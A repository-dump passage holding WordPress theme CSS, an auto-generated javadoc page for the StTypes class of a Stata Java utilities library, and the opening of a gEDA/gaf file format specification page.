2.2em; } #multimedia_box { margin-bottom: 2.2em; } #footer { padding-top: 1.1em; padding-bottom: 1.1em; } /*---:[ #header styles ]:---*/ #header #logo { font-size: 3.6em; line-height: 1.167em; } #header #tagline { font-size: 1.4em; line-height: 1.429em; } /*---:[ nav menu styles ]:---*/ .menu table { bottom: -0.1em; } .nav, .menu li ul { border-width: 0 0 0.1em 0; } .menu li { margin-bottom: -0.1em; } .menu li ul { margin-top: -0.1em; } .menu ul ul { margin-top: 0; } .menu a { font-size: 1.1em; line-height: 1.273em; padding: 0.636em 0.818em; border-width: 0.091em; border-left-width: 0; } .menu ul a { width: 11.818em; border-left-width: 0.091em; } /*---:[ headlines ]:---*/ .headline_area h1, .headline_area h2 { font-size: 2.2em; line-height: 1.364em; } .format_text h2, .format_text h3 { font-size: 1.286em; line-height: 1.222em; margin: 1.833em 0 0.611em 0; } .format_text h4 { font-size: 1em; } .format_text h5 { font-size: 0.786em; } .format_text h6 { font-size: 0.786em; } .teaser h2 { } .sidebar h3 { font-size: 1em; line-height: 1.385em; margin-bottom: 0.692em; } #archive_info h1 { font-size: 1.8em; line-height: 1em; } /*---:[ bylines ]:---*/ .headline_meta { font-size: 1em; line-height: 1.8em; } .headline_meta .pad_left { padding-left: 0.9em; } /*---:[ headline area (image thumbnails) ]:---*/ .headline_area img.alignleft { margin: 0 2.2em 2.2em 0; } .headline_area img.alignright { margin: 0 0 2.2em 2.2em; } .headline_area img.alignnone { margin: 0 auto 2.2em 0; } .headline_area img.aligncenter { margin: 0 auto 2.2em auto; } .headline_area img.frame { padding: 1em; border-width: 0.1em; } /*---:[ post content area ]:---*/ .format_text { font-size: 1.4em; line-height: 1.571em; } .format_text p { margin-bottom: 1.571em; } .format_text p.note, .format_text p.alert { padding: 0.571em 0.786em; } .format_text .drop_cap { font-size: 3.571em; line-height: 0.76em; padding: 0.04em 0.12em 0 0; } .ie6 .format_text .drop_cap { padding-right: 0.06em; } .format_text acronym, .format_text abbr { font-size: 0.786em; } .format_text code, .format_text pre { font-family: Consolas, "Andale Mono", Monaco, Courier, "Courier New", Verdana, sans-serif; } .format_text code { font-size: 0.857em; } .format_text pre { font-size: 0.857em; line-height: 1.5em; margin-bottom: 1.833em; padding: 0.667em 0.917em; } .format_text sub, .format_text sup { line-height: 0.786em } .format_text ul { margin: 0 0 1.571em 1.571em; } .format_text ol { margin: 0 0 1.571em 1.571em; } .format_text ul ul, .format_text ul ol, .format_text ol ul, .format_text ol ol { margin: 0 0 0 1.571em; } .format_text dl { margin-bottom: 1.571em; } .format_text dd { margin-bottom: 1.571em; } .format_text blockquote { margin: 0 0 1.571em 0.786em; padding-left: 0.786em; } /*---:[ pullquotes ]:---*/ .format_text blockquote.right, .format_text blockquote.left { width: 45%; font-size: 1.286em; line-height: 1.222em; } .format_text blockquote.right { margin: 0 0 1.222em 1.222em; } .format_text blockquote.left { margin: 0 1.222em 1.222em 0; } /*---:[ image handling classes ]:---*/ .format_text img.left, .format_text img.alignleft, .wp-caption.alignleft { margin: 0 1.571em 1.571em 0; } .format_text img.right, .format_text img.alignright, .wp-caption.alignright { margin: 0 0 1.571em 1.571em; } .format_text img.center, .format_text img.aligncenter, .wp-caption.aligncenter { margin: 0 auto 1.571em auto; } .format_text img.block, .format_text img.alignnone, .wp-caption.alignnone { margin: 0 auto 1.571em 0; } .format_text img[align="left"] { margin-right: 1.571em; margin-bottom: 1.571em; } .format_text img[align="right"] { margin-bottom: 1.571em; margin-left: 1.571em; } .format_text img[align="middle"] { margin-bottom: 1.571em; } .format_text img.frame, .format_text .wp-caption { padding: 0.714em; border-width: 0.071em; } .format_text img.stack { margin-left: 1.571em; } .format_text .wp-caption p { font-size: 0.857em; line-height: 1.5em; margin-bottom: 0; } /*---:[ ad and miscellaneous "block" classes ]:---*/ .format_text .ad { margin-left: 1.571em; } .format_text .ad_left { margin-right: 1.571em; } /*---:[ after-post elements ]:---*/ .format_text .to_comments { font-size: 0.857em; line-height: 1.833em; margin-bottom: 1.833em; } .format_text .to_comments span { font-size: 1.833em; } .format_text .post_tags { font-size: 0.857em; line-height: 1.833em; margin-bottom: 1.833em; } /*---:[ multimedia box ]:---*/ #custom_box { font-size: 1.3em; line-height: 1.538em; } /*---:[ archive information block ]:---*/ #archive_info { padding-top: 1.1em; padding-bottom: 1.1em; } #archive_info p { font-size: 1em; line-height: 1em; margin-bottom: 1.1em; } /*---:[ previous and next links on index, archive, and search pages ]:---*/ .prev_next { padding-top: 1.1em; padding-bottom: 1.1em; } .prev_next p { font-size: 1em; line-height: 2.2em; } .post_nav .previous { margin-bottom: 0.55em; } .post_nav a { font-size: 1.4em; line-height: 1.571em; } /*---:[ comment area ]:---*/ .comments_intro { margin-top: 4.4em; margin-bottom: 1.1em; } .comments_intro p { font-size: 1.2em; line-height: 1.833em; } .comments_intro span { font-size: 1.833em; } dl#comment_list dt { padding-top: 1.8em; } dl#comment_list dt span { font-size: 1.2em; line-height: 1.833em; } dl#comment_list dt .comment_author { font-size: 1.6em; line-height: 1.375em; padding-right: 0.688em; } .avatar img { margin-left: 0.833em; } .comment_time { padding-right: 0.917em; } .comment_num { padding-left: 0.833em; } .comment_num a { font-size: 1em; line-height: 1.833em; padding: 0.083em 0.25em; } dl#comment_list dd { padding-top: 1.1em; } dl#comment_list dd p.reply a { font-size: 0.786em; line-height: 1.636em; } dl#comment_list dl dd p.reply { margin-bottom: 0; } dl#comment_list dl dt, dl#comment_list dl dd { padding-top: 0; } dl#comment_list dl dd .format_text { margin-bottom: 1.571em; } dl#trackback_list dt { padding-top: 1.1em; } dl#trackback_list dt a { font-size: 1.4em; line-height: 1.571em; } dl#trackback_list dd span { font-size: 1.2em; line-height: 1.833em; } .comments_closed { margin-top: 4.4em; margin-bottom: 2.2em; } /*---:[ comment form styles ]:---*/ #respond_intro { margin-top: 4.4em; margin-bottom: 1.1em; } .comment #respond_intro { margin-top: 0; } #respond_intro p { font-size: 1.7em; line-height: 1.294em; } #cancel-comment-reply-link { font-size: 1.1em; line-height: 1em; padding: 0.545em 0.727em; border-width: 0.182em; } .login_alert { margin-top: 4.4em; margin-bottom: 2.2em; padding: 8em 1.1em; } #commentform { padding-top: 1.1em; padding-bottom: 2.2em; } #commentform p, .login_alert p { font-size: 1.4em; line-height: 1.571em; } #commentform p.comment_box { line-height: 0.786em; } #commentform label { padding-left: 0.786em; } #commentform textarea { height: 12.571em; line-height: 1.571em; } #commentform span.allowed { width: 97.3%; padding-top: 0.5em; padding-bottom: 0.5em; border-width: 0 0.071em 0.071em 0.071em; } #commentform span.allowed span { font-size: 0.857em; line-height: 1.833em; padding: 0 0.583em; } /* Support for the highly-recommended Subscribe to Comments Plugin */ #commentform p.subscribe-to-comments { font-size: 1.4em; } #commentform p.subscribe-to-comments label { font-size: 1em; } /*---:[ sidebar styles ]:---*/ .sidebar { } #column_wrap .sidebar ul.sidebar_list { padding-top: 2.2em; } li.widget { font-size: 1.3em; line-height: 1.385em; margin-bottom: 2.769em; } li.tag_cloud { line-height: 1.692em; } li.widget p { margin-bottom: 1.385em; } li.widget abbr, li.widget acronym { font-size: 0.769em; } li.widget code { font-size: 0.846em; } li.widget ul li { margin-bottom: 0.692em; } li.widget li ul { margin: 0.692em 0 0 1.385em; } /*---:[ widget box styles ]:---*/ li.widget .widget_box { padding: 0.692em; border-width: 0.077em; } /*---:[ google custom search ]:---*/ li.thesis_widget_google_cse form input[type="submit"] { font-size: 1em; margin-top: 0.462em; padding: 0.154em 0.231em; } /*---:[ calendar widget ]:---*/ #calendar_wrap a { padding: 0.077em; } #calendar_wrap a:hover { padding: 0.077em; } table#wp-calendar caption { font-size: 0.846em; line-height: 2em; } table#wp-calendar th { font-size: 0.846em; line-height: 2em; padding-top: 0.091em; } table#wp-calendar td { line-height: 1.692em; } table#wp-calendar td#next, table#wp-calendar td#prev { font-size: 0.846em; line-height: 2em; } table#wp-calendar td#next { padding-right: 0.545em; } table#wp-calendar td#prev { padding-left: 0.545em; } /*---:[ form inputs ]:---*/ input, textarea { font-family: Georgia, "Times New Roman", Times, serif; } .format_text input, #commentform input, #commentform textarea { width: 45%; padding: 0.214em; border-width: 0.071em 0.071em 0.071em 0.071em; } #commentform textarea { width: 96%; } .format_text input.form_submit, #commentform .form_submit { font-size: 1.143em; padding: 0.313em 0.25em; } .sidebar .text_input, .sidebar .form_submit { padding: 0.308em; font-family: Georgia, "Times New Roman", Times, serif; } .sidebar input[type="text"], .sidebar input[type="submit"] { padding: 0.308em; font-family: Georgia, "Times New Roman", Times, serif; } /*---:[ footer styles ]:---*/ #footer p { font-size: 1.2em; line-height: 1.667em; } /*---:[ teaser styles ]:---*/ .teaser h2 { font-size: 1.6em; line-height: 1.375em; } .teaser .format_teaser { font-size: 1.2em; line-height: 1.5em; margin-top: 1.5em; margin-bottom: 1.5em; } .teaser .teaser_author, .teaser .teaser_category, .teaser .teaser_date, .teaser .teaser_comments, .teaser .edit_post { font-family: Georgia, "Times New Roman", Times, serif; } .teaser .teaser_author { font-size: 1em; line-height: 1.6em; } .teaser .teaser_category { font-size: 1em; line-height: 1.6em; } .teaser .teaser_date { font-size: 1em; line-height: 1.6em; } .teaser .teaser_comments { font-size: 1em; line-height: 1.6em; } .teaser .teaser_link { font-size: 1.2em; line-height: 1.5em; } .teaser .post_tags { font-size: 1.1em; line-height: 1.636em; } .teaser .edit_post { padding-left: 0.8em; } /*---:[ thumbnails ]:---*/ .teaser .post_image_link img.alignleft { margin-right: 1.8em; margin-bottom: 1.8em; } .teaser .post_image_link img.alignright { margin-left: 1.8em; margin-bottom: 1.8em; } .teaser .post_image_link img.aligncenter { margin-bottom: 1.8em; } .teaser .post_image_link img.alignnone { margin: 0 auto 1.8em 0; } .teaser .post_image_link img.frame { padding: 0.8em; border-width: 0.1em; } .teaser .format_teaser .post_image_link img.alignleft { margin-right: 0.75em; margin-bottom: 0; } .teaser .format_teaser .post_image_link img.alignright { margin-left: 0.75em; margin-bottom: 0; } .teaser .format_teaser .post_image_link img.aligncenter { margin-bottom: 1.5em; } .teaser .format_teaser .post_image_link img.frame { padding: 0.333em; border-width: 0.083em; } /*---:[ layout colors ]:---*/ body { color: #111111; background: #FFFFFF; } #page { background: #FFFFFF; } a, h2 a:hover, #logo a:hover { color: #2361A1; } #logo, #logo a { color: #111111; } #tagline { color: #888888 } h1, h2, h2 a { color: #111111; } .headline_meta, .headline_meta a, .teaser_author, .teaser_date, .teaser .edit_post, .teaser_author a, .teaser_comments, .teaser_category, .teaser .edit_post a { color: #888888; } .headline_meta a:hover, .teaser_author a:hover, .teaser_comments:hover, .teaser_category:hover, .teaser .edit_post a:hover { color: #111111; } .sidebar h3 { color: #555555; } .image_box { background: #EEEEEE; } .video_box { background: #000000; } .custom_box { background: #EEEEEE; } #footer, #footer a { color: #888888; } #footer a:hover { color: #111111; } /*---:[ nav colors ]:---*/ .menu, .menu a, .menu li ul { border-color: #DDDDDD; } .menu .current a, .menu .current-cat a { border-bottom-color: #FFFFFF; } .menu ul .current a, .menu ul .current-cat a, .menu .current ul a, .menu .current-cat ul a { border-bottom-color: #DDDDDD; } .menu a, .menu .current ul a, .menu .current-cat ul a { color: #111111; background: #EFEFEF; } .menu a:hover, .menu .current ul a:hover, .menu .current-cat ul a:hover, .menu .current-parent a:hover { color: #111111; background: #DDDDDD; } .menu .current a, .menu .current a:hover, .menu .current-cat a, .menu .current-cat a:hover { color: #111111; background: #FFFFFF; } .menu .current-parent > a, .menu .current-cat-parent > a { color: #111111; background: #F0EEC2; } /*---:[ border package ]:---*/ #header { border-width: 0 0 0.3em 0; } .post_box, .teasers_box { border-width: 0.1em 0 0 0; } #footer { border-width: 0.3em 0 0 0; } #feature_box, #archive_info, #comment_nav_2 { border-width: 0 0 0.2em 0; } .prev_next { border-width: 0.2em 0 0 0; } .image_box, .custom_box { border-width: 0 0 0.1em 0; }
docs/org/paces/Stata/DataTypes/StTypes.html
wbuchanan/StataJavaUtilities
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_102) on Thu Jul 27 09:16:46 EDT 2017 --> <title>StTypes</title> <meta name="date" content="2017-07-27"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="StTypes"; } } catch(err) { } //--> var methods = {"i0":9,"i1":9,"i2":9,"i3":9,"i4":9,"i5":9}; var tabs = {65535:["t0","All Methods"],1:["t1","Static Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/StTypes.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev&nbsp;Class</li> <li>Next&nbsp;Class</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/paces/Stata/DataTypes/StTypes.html" target="_top">Frames</a></li> <li><a href="StTypes.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field.summary">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field.detail">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.paces.Stata.DataTypes</div> <h2 title="Class StTypes" class="title">Class StTypes</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>org.paces.Stata.DataTypes.StTypes</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public class <span class="typeNameLabel">StTypes</span> extends java.lang.Object</pre> <dl> <dt><span class="simpleTagLabel">Version:</span></dt> <dd>%G%</dd> <dt><span class="simpleTagLabel">Author:</span></dt> <dd>Billy Buchanan</dd> </dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field.summary"> <!-- --> </a> <h3>Field Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation"> <caption><span>Fields</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Field and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>private static java.lang.Integer</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#version">version</a></span></code> <div class="block">The Stata version calling this class</div> </td> </tr> </table> </li> </ul> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#StTypes--">StTypes</a></span>()</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t1" class="tableTab"><span><a href="javascript:show(1);">Static Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>static java.lang.Byte</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#asByte-java.lang.Integer-java.lang.Number-">asByte</a></span>(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</code> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> </td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>static java.lang.Double</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#asDouble-java.lang.Integer-java.lang.Number-">asDouble</a></span>(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</code> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> </td> </tr> <tr id="i2" class="altColor"> <td class="colFirst"><code>static java.lang.Float</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#asFloat-java.lang.Integer-java.lang.Number-">asFloat</a></span>(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</code> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> </td> </tr> <tr id="i3" class="rowColor"> <td class="colFirst"><code>static java.lang.Integer</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#asInteger-java.lang.Integer-java.lang.Number-">asInteger</a></span>(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</code> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> </td> </tr> <tr id="i4" class="altColor"> <td class="colFirst"><code>static java.lang.Long</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#asLong-java.lang.Integer-java.lang.Number-">asLong</a></span>(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</code> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> </td> </tr> <tr id="i5" class="rowColor"> <td class="colFirst"><code>static java.lang.Short</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../org/paces/Stata/DataTypes/StTypes.html#asShort-java.lang.Integer-java.lang.Number-">asShort</a></span>(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</code> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ FIELD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="field.detail"> <!-- --> </a> <h3>Field Detail</h3> <a name="version"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>version</h4> <pre>private static final&nbsp;java.lang.Integer version</pre> <div class="block">The Stata version calling this class</div> </li> </ul> </li> </ul> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="StTypes--"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>StTypes</h4> <pre>public&nbsp;StTypes()</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="asByte-java.lang.Integer-java.lang.Number-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>asByte</h4> <pre>public static&nbsp;java.lang.Byte&nbsp;asByte(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</pre> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>varid</code> - The variable index value</dd> <dd><code>obid</code> - The observation index value</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>A Byte value from the specified variable for the observation obid</dd> </dl> </li> </ul> <a name="asInteger-java.lang.Integer-java.lang.Number-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>asInteger</h4> <pre>public static&nbsp;java.lang.Integer&nbsp;asInteger(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</pre> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>varid</code> - The variable index value</dd> <dd><code>obid</code> - The observation index value</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>A Byte value from the specified variable for the observation obid</dd> </dl> </li> </ul> <a name="asShort-java.lang.Integer-java.lang.Number-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>asShort</h4> <pre>public static&nbsp;java.lang.Short&nbsp;asShort(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</pre> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>varid</code> - The variable index value</dd> <dd><code>obid</code> - The observation index value</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>A Byte value from the specified variable for the observation obid</dd> </dl> </li> </ul> <a name="asLong-java.lang.Integer-java.lang.Number-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>asLong</h4> <pre>public static&nbsp;java.lang.Long&nbsp;asLong(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</pre> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>varid</code> - The variable index value</dd> <dd><code>obid</code> - The observation index value</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>A Byte value from the specified variable for the observation obid</dd> </dl> </li> </ul> <a name="asFloat-java.lang.Integer-java.lang.Number-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>asFloat</h4> <pre>public static&nbsp;java.lang.Float&nbsp;asFloat(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</pre> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>varid</code> - The variable index value</dd> <dd><code>obid</code> - The observation index value</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>A Byte value from the specified variable for the observation obid</dd> </dl> </li> </ul> <a name="asDouble-java.lang.Integer-java.lang.Number-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>asDouble</h4> <pre>public static&nbsp;java.lang.Double&nbsp;asDouble(java.lang.Integer&nbsp;varid, java.lang.Number&nbsp;obid)</pre> <div class="block">Method to cast datum returned by the Data.getNum method of the Stata Java API as a Byte value</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>varid</code> - The variable index value</dd> <dd><code>obid</code> - The observation index value</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>A Byte value from the specified variable for the observation obid</dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/StTypes.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev&nbsp;Class</li> <li>Next&nbsp;Class</li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/paces/Stata/DataTypes/StTypes.html" target="_top">Frames</a></li> <li><a href="StTypes.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field.summary">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field.detail">Field</a>&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
docs/wiki/geda-file_format_spec.html
anbe42/tmp-geda-gaf
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title> <link rel="stylesheet" media="screen" type="text/css" href="./style.css" /> <link rel="stylesheet" media="screen" type="text/css" href="./design.css" /> <link rel="stylesheet" media="print" type="text/css" href="./print.css" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <div class="toc"> <div class="tocheader toctoggle" id="toc__header">Table of Contents</div> <div id="toc__inside"> <ul class="toc"> <li class="level1"><div class="li"><span class="li"><a href="#geda_gaf_file_format_document" class="toc">gEDA/gaf File Format Document</a></span></div> <ul class="toc"> <li class="level2"><div class="li"><span class="li"><a href="#overview" class="toc">Overview</a></span></div></li> <li class="level2"><div class="li"><span class="li"><a href="#coordinate_space" class="toc">Coordinate Space</a></span></div></li> <li class="level2"><div class="li"><span class="li"><a href="#filenames" class="toc">Filenames</a></span></div></li> <li class="level2"><div class="li"><span class="li"><a href="#object_types" class="toc">Object types</a></span></div> <ul class="toc"> <li class="level3"><div class="li"><span class="li"><a href="#version" class="toc">version</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#line" class="toc">line</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#picture" class="toc">picture</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#box" class="toc">box</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#circle" class="toc">circle</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#arc" class="toc">arc</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#text" class="toc">text</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#net" class="toc">net</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#bus" class="toc">bus</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#pin" class="toc">pin</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#component" class="toc">component</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#path" class="toc">path</a></span></div></li> <li class="level3"><div class="li"><span class="li"><a href="#font" class="toc">font</a></span></div></li> </ul> </li> <li class="level2"><div class="li"><span class="li"><a href="#colors" class="toc">Colors</a></span></div></li> <li class="level2"><div class="li"><span class="li"><a href="#attributes" class="toc">Attributes</a></span></div></li> <li class="level2"><div class="li"><span class="li"><a href="#embedded_components" class="toc">Embedded Components</a></span></div></li> <li class="level2"><div class="li"><span class="li"><a href="#path_data" class="toc">Path data</a></span></div></li> <li class="level2"><div class="li"><span class="li"><a href="#document_revision_history" class="toc">Document Revision History</a></span></div></li></ul> </li></ul> </div> </div> <h1><a name="geda_gaf_file_format_document" id="geda_gaf_file_format_document">gEDA/gaf File Format Document</a></h1> <div class="level1"> <p> by: Ales V. Hvezda, ahvezda@geda.seul.org </p> <p> This document is released under <a 